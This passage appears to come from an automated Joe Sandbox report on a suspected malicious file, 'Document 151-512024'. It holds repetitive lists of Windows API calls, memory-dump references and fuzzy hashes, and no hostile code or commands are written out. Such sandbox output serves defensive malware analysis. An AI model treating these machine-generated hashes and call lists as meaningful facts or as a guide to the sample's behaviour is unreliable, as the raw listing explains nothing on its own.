                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                    • String ID:
                                                                                                    • API String ID: 87235514-0
                                                                                                    • Opcode ID: 0dcba8a9e8589d95af4c7b6e1b57188c4ba9b34e2265d1eb7ee80914c13bb28e
                                                                                                    • Instruction ID: f78e8e26669f7d9f247fee62572a5dd12f04fe058d8cb0194bd935b264c7b697
                                                                                                    • Opcode Fuzzy Hash: 0dcba8a9e8589d95af4c7b6e1b57188c4ba9b34e2265d1eb7ee80914c13bb28e
                                                                                                    • Instruction Fuzzy Hash: 7751C2A15487D63EFB3782248C55B7ABEAC6B47300F188489E1D5568C2D394EC88E7A2
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(00983CD6,?,?,?,?,?,?,?,?,00975BA3,?,?,00983CD6,?,?), ref: 00975470
                                                                                                    • __fassign.LIBCMT ref: 009754EB
                                                                                                    • __fassign.LIBCMT ref: 00975506
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00983CD6,00000005,00000000,00000000), ref: 0097552C
                                                                                                    • WriteFile.KERNEL32(?,00983CD6,00000000,00975BA3,00000000,?,?,?,?,?,?,?,?,?,00975BA3,?), ref: 0097554B
                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00975BA3,00000000,?,?,?,?,?,?,?,?,?,00975BA3,?), ref: 00975584
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: 3d9155dfac83fd8df6582220154cb96bdbd057b7d7806b283ec9276e6964cb50
                                                                                                    • Instruction ID: 85d237bb077e45d7faed41ab35aa740ae83b11da2a81ae2cb6a82c054e392b44
                                                                                                    • Opcode Fuzzy Hash: 3d9155dfac83fd8df6582220154cb96bdbd057b7d7806b283ec9276e6964cb50
                                                                                                    • Instruction Fuzzy Hash: 3F51D6B2A0064A9FDB10CFA8D845AEEBBF9EF09300F15851EF559E7291D770DA41CB60
                                                                                                    APIs
                                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 009D6C33
                                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 009D6C4A
                                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 009D6C73
                                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,009BAB79,00000000,00000000), ref: 009D6C98
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 009D6CC7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 3688381893-3368625520
                                                                                                    • Opcode ID: e2789aacdcba1970f4df53b15d6d64eb4402e0a6ba4a49c53bae0f41a52478be
                                                                                                    • Instruction ID: 473164b7a2371138adc24db000eb7d6595d9418b516d8d9d812a2d5abaf1f274
                                                                                                    • Opcode Fuzzy Hash: e2789aacdcba1970f4df53b15d6d64eb4402e0a6ba4a49c53bae0f41a52478be
                                                                                                    • Instruction Fuzzy Hash: D2410635A94104AFDB24CF78CD58FA97BA9EB09350F14822AFAD5A73E0C375ED41DA40
                                                                                                    APIs
                                                                                                    • GetCursorPos.USER32(?), ref: 00959141
                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 0095915E
                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00959183
                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 0095919D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                    • String ID: Se31
                                                                                                    • API String ID: 4210589936-324342673
                                                                                                    • Opcode ID: 7ff5d38c37f4b58982f46b7e7cae68352edb6d0acd994ace4c45d35ef810f969
                                                                                                    • Instruction ID: cdddb68850dd0492bb178bc72079bf7237b5e514b20c53bd464f1c8823c1dd5d
                                                                                                    • Opcode Fuzzy Hash: 7ff5d38c37f4b58982f46b7e7cae68352edb6d0acd994ace4c45d35ef810f969
                                                                                                    • Instruction Fuzzy Hash: 4A418D71A0C61AEBDF15DFA8C844BEEB774FB45321F208216E825A2290CB346954CB91
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00962D4B
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00962D53
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00962DE1
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00962E0C
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00962E61
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 3e5702b5a810b288deb3652fefdd0952bfae9b5b794ab20dc12fc215771b853d
                                                                                                    • Instruction ID: da9b809b45ff5b676788b04d3003e7b1418d1e682df1f51fcc4d14fc61b89086
                                                                                                    • Opcode Fuzzy Hash: 3e5702b5a810b288deb3652fefdd0952bfae9b5b794ab20dc12fc215771b853d
                                                                                                    • Instruction Fuzzy Hash: A641C334A00609ABCF10DF68C855ADEBBB9BF85364F148565E8146B392D735AE01CBD0
                                                                                                    APIs
                                                                                                      • Part of subcall function 009C304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009C307A
                                                                                                      • Part of subcall function 009C304E: _wcslen.LIBCMT ref: 009C309B
                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009C1112
                                                                                                    • WSAGetLastError.WSOCK32 ref: 009C1121
                                                                                                    • WSAGetLastError.WSOCK32 ref: 009C11C9
                                                                                                    • closesocket.WSOCK32(00000000), ref: 009C11F9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 2675159561-0
                                                                                                    • Opcode ID: 308c753bf5119dbdd9ca7ebd3c8498859a17f5f9519ebacf56839ce5141e3260
                                                                                                    • Instruction ID: bb3a9c6f4bbb54307072de0809b44a27d4cbd8bfda834fdf2ad79ea53647bbf9
                                                                                                    • Opcode Fuzzy Hash: 308c753bf5119dbdd9ca7ebd3c8498859a17f5f9519ebacf56839ce5141e3260
                                                                                                    • Instruction Fuzzy Hash: AD412571A04205AFDB109F14C884FA9B7E9EF86324F188159FD159B292C778ED81CBE6
                                                                                                    APIs
                                                                                                      • Part of subcall function 009ADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009ACF22,?), ref: 009ADDFD
                                                                                                      • Part of subcall function 009ADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009ACF22,?), ref: 009ADE16
                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 009ACF45
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 009ACF7F
                                                                                                    • _wcslen.LIBCMT ref: 009AD005
                                                                                                    • _wcslen.LIBCMT ref: 009AD01B
                                                                                                    • SHFileOperationW.SHELL32(?), ref: 009AD061
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 3164238972-1173974218
                                                                                                    • Opcode ID: 57e28d1d6985a290299708796ed9248f0ae6a01f5d3ceb42875e4bdc6045f494
                                                                                                    • Instruction ID: e5dfcd33a7a8313db72132ffc173a4b53716ef55f5249a9d68f3c652b71157e8
                                                                                                    • Opcode Fuzzy Hash: 57e28d1d6985a290299708796ed9248f0ae6a01f5d3ceb42875e4bdc6045f494
                                                                                                    • Instruction Fuzzy Hash: 4A4137B19462195FDF12EFA4D981FDEB7BDAF49380F1004E6E505EB141EB34A684CB90
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009A7769
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009A778F
                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 009A7792
                                                                                                    • SysAllocString.OLEAUT32(?), ref: 009A77B0
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 009A77B9
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 009A77DE
                                                                                                    • SysAllocString.OLEAUT32(?), ref: 009A77EC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                    • String ID:
                                                                                                    • API String ID: 3761583154-0
                                                                                                    • Opcode ID: 10e7a9331290dcdcdf4a278f89105b6be37b57b39de6c18d9713180d09d90115
                                                                                                    • Instruction ID: fd67ee78e911a1a23bda0409041a560f56fb6f2bcf4f63266c4f269c3ed685b6
                                                                                                    • Opcode Fuzzy Hash: 10e7a9331290dcdcdf4a278f89105b6be37b57b39de6c18d9713180d09d90115
                                                                                                    • Instruction Fuzzy Hash: D621C476609219AFDF10DFE8CC89DBBB3ACEB0A3647008526F904DB160D670DC85C7A0
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009A7842
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009A7868
                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 009A786B
                                                                                                    • SysAllocString.OLEAUT32 ref: 009A788C
                                                                                                    • SysFreeString.OLEAUT32 ref: 009A7895
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 009A78AF
                                                                                                    • SysAllocString.OLEAUT32(?), ref: 009A78BD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                    • String ID:
                                                                                                    • API String ID: 3761583154-0
                                                                                                    • Opcode ID: 1b9966d199ffe8035baacd235a930c27229317883d02ba7cc9d09ac1eeaaf6df
                                                                                                    • Instruction ID: e998253619810f919feaf50089dd2b69610638b8e37369df1ff42f5b467a6689
                                                                                                    • Opcode Fuzzy Hash: 1b9966d199ffe8035baacd235a930c27229317883d02ba7cc9d09ac1eeaaf6df
                                                                                                    • Instruction Fuzzy Hash: 90219071609205BFDB109FECDC89DAAB7ACEF0A3607108125F915CB2A5D678DC81DBA4
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 009B04F2
                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009B052E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateHandlePipe
                                                                                                    • String ID: nul
                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                    • Opcode ID: 831b88b3800151aac4a0aeff1f10fcf4fdb2a204edd6135f3a466262bffcf42a
                                                                                                    • Instruction ID: 60f42d381bbc382387c3aae2c5df4982779af8b4a840c50528e56979ead85428
                                                                                                    • Opcode Fuzzy Hash: 831b88b3800151aac4a0aeff1f10fcf4fdb2a204edd6135f3a466262bffcf42a
                                                                                                    • Instruction Fuzzy Hash: 972151B5500305AFDB309F6ADD48A9B77A8BF84774F204A19F9A1D61E0D7B0D950DF20
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 009B05C6
                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009B0601
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateHandlePipe
                                                                                                    • String ID: nul
                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                    • Opcode ID: bbd5988ad39b31ca82eb10d36c3de13f0c9c2115ba0ea8736f8fa2115c499f60
                                                                                                    • Instruction ID: 5555ae6129d989e9febf72e5f997a8dc2cdb1a9b4504b04b3ed26643615b0420
                                                                                                    • Opcode Fuzzy Hash: bbd5988ad39b31ca82eb10d36c3de13f0c9c2115ba0ea8736f8fa2115c499f60
                                                                                                    • Instruction Fuzzy Hash: E0216D75540206DBDB209F699904ADB77E8BFD5770F200B19F9A1E72E0D6B098A0CB10
                                                                                                    APIs
                                                                                                      • Part of subcall function 0094600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0094604C
                                                                                                      • Part of subcall function 0094600E: GetStockObject.GDI32(00000011), ref: 00946060
                                                                                                      • Part of subcall function 0094600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0094606A
                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009D4112
                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009D411F
                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009D412A
                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009D4139
                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009D4145
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                    • String ID: Msctls_Progress32
                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                    • Opcode ID: d8d5027ffe90bcfcc92ecc382475fc0a44257c893740fefe5f6b9f90a1995787
                                                                                                    • Instruction ID: 3d96b65dc0ed889a666fc746ded83930b0331dd49729fbc60e474ecab9befc34
                                                                                                    • Opcode Fuzzy Hash: d8d5027ffe90bcfcc92ecc382475fc0a44257c893740fefe5f6b9f90a1995787
                                                                                                    • Instruction Fuzzy Hash: 5A1193B1190119BFEF118E64CC85EE77F6DEF18798F008111B718A2190C6729C61DBA4
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000008), ref: 009598CC
                                                                                                    • SetTextColor.GDI32(?,?), ref: 009598D6
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 009598E9
                                                                                                    • GetStockObject.GDI32(00000005), ref: 009598F1
                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00959952
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$LongModeObjectStockTextWindow
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 1860813098-3368625520
                                                                                                    • Opcode ID: 53465cde822c0a60f1e70550fc3a82af9024ec4b8345d033f989c3b4f1a7907a
                                                                                                    • Instruction ID: 03701a48b248c345c7e091948b09b07d41dd5fe63091e58b8f607388814e5d7f
                                                                                                    • Opcode Fuzzy Hash: 53465cde822c0a60f1e70550fc3a82af9024ec4b8345d033f989c3b4f1a7907a
                                                                                                    • Instruction Fuzzy Hash: F521783118A251DFDB12CF25EC64AE53F68EF13331B08018EF9928B0A2C7354985DB51
                                                                                                    APIs
                                                                                                      • Part of subcall function 0097D7A3: _free.LIBCMT ref: 0097D7CC
                                                                                                    • _free.LIBCMT ref: 0097D82D
                                                                                                      • Part of subcall function 009729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000), ref: 009729DE
                                                                                                      • Part of subcall function 009729C8: GetLastError.KERNEL32(00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000,00000000), ref: 009729F0
                                                                                                    • _free.LIBCMT ref: 0097D838
                                                                                                    • _free.LIBCMT ref: 0097D843
                                                                                                    • _free.LIBCMT ref: 0097D897
                                                                                                    • _free.LIBCMT ref: 0097D8A2
                                                                                                    • _free.LIBCMT ref: 0097D8AD
                                                                                                    • _free.LIBCMT ref: 0097D8B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                    • Instruction ID: f1ca1309c00d26fde3a8e9d999a4b05ae2666b8433a1dbc71340a3486b79f6a2
                                                                                                    • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                    • Instruction Fuzzy Hash: 8B1151B3542B04AAE521BFB4CC47FCBBBEC6FC0700F448825B29DA6092DA65B5454650
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009ADA74
                                                                                                    • LoadStringW.USER32(00000000), ref: 009ADA7B
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009ADA91
                                                                                                    • LoadStringW.USER32(00000000), ref: 009ADA98
                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009ADADC
                                                                                                    Strings
                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 009ADAB9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
